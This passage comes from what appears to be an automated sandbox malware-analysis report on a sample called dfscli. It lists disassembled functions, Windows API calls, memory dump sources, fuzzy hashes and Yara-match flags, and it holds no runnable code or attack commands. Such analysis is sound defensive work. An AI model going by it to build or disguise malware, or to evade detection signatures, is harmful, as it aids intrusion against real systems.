                                                                    • Part of subcall function 0040E502: HeapFree.KERNEL32(00000000,?,00431A60,0000000C,004108CC,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010), ref: 0040E567
                                                                  • GetTimeZoneInformation.KERNEL32(0043F808,00432298,00000018,004150F8,004322A8,00000008,0040F746,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 00414C07
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0043F80C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,?), ref: 00414C95
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0043F860,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,?), ref: 00414CC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
                                                                  • String ID:
                                                                  • API String ID: 3757401926-0
                                                                  • Opcode ID: a12a00952cfbe2cbfe0e02be742bc80dcd0c2f8750305a48b7d58f6abd9f11fa
                                                                  • Instruction ID: b88b56355e109a379969b639f8961749b468b39d063f6cbed0312a5d21008a68
                                                                  • Opcode Fuzzy Hash: a12a00952cfbe2cbfe0e02be742bc80dcd0c2f8750305a48b7d58f6abd9f11fa
                                                                  • Instruction Fuzzy Hash: 1B7137319042419EDB28AF29FC85B967BE5E785310F64253BE850E72E1E73C48C2CB5D
                                                                  Function 021C14A0 Relevance: 12.2, APIs: 8, Instructions: 171COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021C14DB
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021C1507
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: 2ff42435e9c1128df88de3cde3dbb1a97e46d6a2bb984d43cf9e365cf9cc3bbf
                                                                  • Instruction ID: 4ebed1f44929cc9d0b7056100264d81e218fb4ba4fc3f7b9b10317cdea554e75
                                                                  • Opcode Fuzzy Hash: 2ff42435e9c1128df88de3cde3dbb1a97e46d6a2bb984d43cf9e365cf9cc3bbf
                                                                  • Instruction Fuzzy Hash: F071FB78E80119EFDB08DF94C580BADB7B2FF58304F248598D51AAB342D774AA91DF90
                                                                  Function 0041773D Relevance: 12.2, APIs: 8, Instructions: 169COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,?,00432B10,00000038,00415751,?,00000000,00000000,0040FE1B,00000000,00000000,004322F0,0000001C,0040FB4A,00000001,00000020), ref: 0041777B
                                                                  • GetCPInfo.KERNEL32(00000000,00000001), ref: 0041778E
                                                                  • _strlen.LIBCMT ref: 004177B2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,0040FE1B,?,00000000,00000000), ref: 004177D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Info$ByteCharMultiWide_strlen
                                                                  • String ID:
                                                                  • API String ID: 1335377746-0
                                                                  • Opcode ID: 16f72e5b873a4ab48f6271f059b37c8091238466f59f76de78d94d45d57762bb
                                                                  • Instruction ID: c96e7402d8f87136a9c376d92da51b645b4312610aa90fcb7a9bffc7d4a68029
                                                                  • Opcode Fuzzy Hash: 16f72e5b873a4ab48f6271f059b37c8091238466f59f76de78d94d45d57762bb
                                                                  • Instruction Fuzzy Hash: 25518E70A04218EBDF21AFA6DC89DEFBBB9EF84354F24412BF415A2290D7345D91CB64
                                                                  Function 00426D32 Relevance: 12.1, APIs: 8, Instructions: 134windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00426D37
                                                                    • Part of subcall function 0040D93F: __EH_prolog.LIBCMT ref: 0040D944
                                                                  • GetCapture.USER32 ref: 0042750F
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427528
                                                                  • GetFocus.USER32 ref: 0042753A
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427546
                                                                  • GetLastActivePopup.USER32(?), ref: 0042756D
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427578
                                                                  • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0042759C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog$ActiveCaptureFocusLastPopup
                                                                  • String ID:
                                                                  • API String ID: 2915395904-0
                                                                  • Opcode ID: 985eb66304feea1a64375c5613d292e13957ddd9534c99a91611df43f47409d5
                                                                  • Instruction ID: 19a528a7567d654ee424c3ff896293cafdfeef5f92fb810e1dffabcbd8df109d
                                                                  • Opcode Fuzzy Hash: 985eb66304feea1a64375c5613d292e13957ddd9534c99a91611df43f47409d5
                                                                  • Instruction Fuzzy Hash: 0541F071704228BFCB24AB65EC44E7FB6A9EF44384B60043FF101D3690CB78CC829669
                                                                  Function 00412A67 Relevance: 12.1, APIs: 8, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412A83
                                                                  • GetLastError.KERNEL32(?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412A97
                                                                  • GetEnvironmentStringsW.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412AB9
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,76230A60,00000000,?,?,?,?,0040E927), ref: 00412AED
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B0F
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B28
                                                                  • GetEnvironmentStrings.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B3E
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00412B7A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 883850110-0
                                                                  • Opcode ID: 1a7aa8cc262657e72444d06c6bde20108307b8118384107d7f56e1d07f72045c
                                                                  • Instruction ID: accb5785985df4b6819ef042d50e533d603ff3fa48001b7d390ff30f191b463a
                                                                  • Opcode Fuzzy Hash: 1a7aa8cc262657e72444d06c6bde20108307b8118384107d7f56e1d07f72045c
                                                                  • Instruction Fuzzy Hash: 9F3159726082656FD7302F759EC48BBB78CEB45394715083BF142C3250E6E86CE582BD
                                                                  Function 0041F239 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalLock.KERNEL32(?), ref: 0041F256
                                                                  • lstrcmpA.KERNEL32(?,?), ref: 0041F262
                                                                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041F274
                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041F294
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041F29C
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0041F2A6
                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0041F2B3
                                                                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0041F2CB
                                                                    • Part of subcall function 0042663E: GlobalFlags.KERNEL32(?), ref: 00426648
                                                                    • Part of subcall function 0042663E: GlobalUnlock.KERNEL32(?,00000000,?,0041F2C5,?,00000000,?,?,00000000,00000000,00000002), ref: 00426659
                                                                    • Part of subcall function 0042663E: GlobalFree.KERNEL32(?), ref: 00426664
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                  • String ID:
                                                                  • API String ID: 168474834-0
                                                                  • Opcode ID: c54c654e90a360fa660b54eee4c91334e9e2f47313cccc9f547efc29e8fe9139
                                                                  • Instruction ID: 8fa5d7953f2ec37764842a3f19103b125725ee6fb1def39efba1f66d7d1e0517
                                                                  • Opcode Fuzzy Hash: c54c654e90a360fa660b54eee4c91334e9e2f47313cccc9f547efc29e8fe9139
                                                                  • Instruction Fuzzy Hash: 51110676200104BEDB216BA6CC45DAFBABDEF84700B50046EF605D1220D73AC992DB78
                                                                  Function 022312B0 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E?*$a7a&$a7a&$Ei$Ei
                                                                  • API String ID: 0-288907479
                                                                  • Opcode ID: a90822e4b0b099060805fe5c384b008ef36b3c28567d5861b868bfc87914f056
                                                                  • Instruction ID: 75f249365da1273c7830dfa8a19f86c2169207a5f2f27f1327badec8b84f03a5
                                                                  • Opcode Fuzzy Hash: a90822e4b0b099060805fe5c384b008ef36b3c28567d5861b868bfc87914f056
                                                                  • Instruction Fuzzy Hash: 3BE1BEB16243028BC71ADFE4D890A6BB3E6BBC4744F04491DE48ADB348DB74ED15CB92
                                                                  Function 00404B45 Relevance: 10.7, APIs: 7, Instructions: 247memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00404B4A
                                                                  • MapDialogRect.USER32(?,?), ref: 00404BD8
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00404BF9
                                                                  • CLSIDFromString.OLE32(?,00000004), ref: 00404CF7
                                                                  • CLSIDFromProgID.OLE32(?,00000004), ref: 00404CFF
                                                                  • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 00404D9B
                                                                  • SysFreeString.OLEAUT32(?), ref: 00404DEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                  • String ID:
                                                                  • API String ID: 493809305-0
                                                                  • Opcode ID: 90d6fed022f37205e91faeaac6504b74e0f75d282e9fda82b03ffbdba748a2f0
                                                                  • Instruction ID: b3c49ecfdae2261962f2f72699b3bcc1d5c4594392ee8f9afc26f4e19ff51694
                                                                  • Opcode Fuzzy Hash: 90d6fed022f37205e91faeaac6504b74e0f75d282e9fda82b03ffbdba748a2f0
                                                                  • Instruction Fuzzy Hash: A1A146B1900219DFDB14DFA9D884AEEBBB4FF48304F10452EE919A7391D738A951CFA4
                                                                  Function 004148BE Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00411DA5: GetLastError.KERNEL32(?,00000000,0040F9CC,004108AA,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010,0041200F), ref: 00411DA7
                                                                    • Part of subcall function 00411DA5: FlsGetValue.KERNEL32(?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DB5
                                                                    • Part of subcall function 00411DA5: FlsSetValue.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DDC
                                                                    • Part of subcall function 00411DA5: GetCurrentThreadId.KERNEL32 ref: 00411DF4
                                                                    • Part of subcall function 00411DA5: SetLastError.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411E0B
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414930
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414A2D
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414A86
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414AA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414AC6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                  • String ID: ^@
                                                                  • API String ID: 223281555-3067454934
                                                                  • Opcode ID: 661871ab33832ade7b7aaf52d2a942668b7e032303f44cc99fa12acc2a8bb67a
                                                                  • Instruction ID: d8969bca762c2fff75cd20f14addf9e5daf178b08686a22cb2c5a04f5c96d0d7
                                                                  • Opcode Fuzzy Hash: 661871ab33832ade7b7aaf52d2a942668b7e032303f44cc99fa12acc2a8bb67a
                                                                  • Instruction Fuzzy Hash: 1F61D8B6A40305AFDB14DFA9CC41BABB3B6EFC4354F25412FF5009B281D7B999808B58
                                                                  Function 00421820 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0042184E
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421875
                                                                  • UpdateWindow.USER32(?), ref: 0042188F
                                                                  • SendMessageA.USER32(?,00000121,00000000,?), ref: 004218B3
                                                                  • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004218CD
                                                                  • UpdateWindow.USER32(?), ref: 00421913
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421947
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                  • String ID:
                                                                  • API String ID: 2853195852-0
                                                                  • Opcode ID: b2be0544251454af26a063944dae0fad199999050631c7f4df3474e00c2e4742
                                                                  • Instruction ID: bda951081c485ca147d81411007fe1a190cd778f32f816f53062b6f76fcfd76d
                                                                  • Opcode Fuzzy Hash: b2be0544251454af26a063944dae0fad199999050631c7f4df3474e00c2e4742
                                                                  • Instruction Fuzzy Hash: 2141E4307043519BD731AF26AC84A2BBAF4FFD1758F90092EF48192271C73A8946CB5A
                                                                  Function 0040698F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114comstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00406994
                                                                  • GetObjectA.GDI32(00405B22,0000003C,?), ref: 00406A00
                                                                  • lstrlenA.KERNEL32(?), ref: 00406A11
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00406A88
                                                                  • OleCreateFontIndirect.OLEAUT32(00000020,00433CFC,?), ref: 00406AB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                  • String ID:
                                                                  • API String ID: 4082312370-3916222277
                                                                  • Opcode ID: 61b9ff90e36958d84cbc1077bd490824df986479636f83f491aa45025cd70d28
                                                                  • Instruction ID: c4ebfa65322681a217c67680f7c020fd47e848ba818764bf4c75e36be929e26e
                                                                  • Opcode Fuzzy Hash: 61b9ff90e36958d84cbc1077bd490824df986479636f83f491aa45025cd70d28
                                                                  • Instruction Fuzzy Hash: 34417771E002199BCB10EFE5D845AADBBB4BF18308F10817EE556F7291E7388A09CB54
                                                                  Function 00428790 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00428795
                                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00428875
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00428892
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 004288B2
                                                                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004288CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CloseEnumH_prologOpenQueryValue
                                                                  • String ID: Software\
                                                                  • API String ID: 2161548231-964853688
                                                                  • Opcode ID: f4d1ca52cbf1251d97ab6773c42b41e562382329021e483681a562ce626031c5
                                                                  • Instruction ID: 0a6b551ca9cc724c7325d587e2d88eb9b1ee1faeb4156374ebf6c637dd52548d
                                                                  • Opcode Fuzzy Hash: f4d1ca52cbf1251d97ab6773c42b41e562382329021e483681a562ce626031c5
                                                                  • Instruction Fuzzy Hash: 4241C331A001289BDB21EB65DC41EEEB7B9EF49304F9041AEF145A2191CB789A52CF98
                                                                  Function 00403CE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMenu.USER32(?,00000000,?,?,?,?,?,0042CC28,000000FF), ref: 00403D06
                                                                  • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00403D6D
                                                                  • AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 00403D78
                                                                    • Part of subcall function 00403920: FindResourceA.KERNEL32(?,?,00000006), ref: 0040393A
                                                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 00403DB5
                                                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 00403DC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$AppendMessageSend$FindResourceSystem
                                                                  • String ID: loopback
                                                                  • API String ID: 858472958-3546420730
                                                                  • Opcode ID: 4598b109ee9e33227e9328b0220a52c1a9e23e073aa70865d030f30849e1bb02
                                                                  • Instruction ID: 4823e85a43f7f0f7c6a3d4925acab711e54c1865e72890e5d36366e388cdfcd7
                                                                  • Opcode Fuzzy Hash: 4598b109ee9e33227e9328b0220a52c1a9e23e073aa70865d030f30849e1bb02
                                                                  • Instruction Fuzzy Hash: 26319E71240701ABD324EF65DC45F97B7A8FF84720F408A1EF6569B2D1CBB8A805CB58
                                                                  Function 00429A96 Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F1BC,00000000,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF), ref: 00429AA6
                                                                  • TlsGetValue.KERNEL32(0043F1A0,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429AC4
                                                                  • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940), ref: 00429B20
                                                                  • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3), ref: 00429B32
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429B3F
                                                                  • TlsSetValue.KERNEL32(0043F1A0,00000000), ref: 00429B6F
                                                                  • LeaveCriticalSection.KERNEL32(0043F1BC,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429B90
                                                                  Memory Dump Source
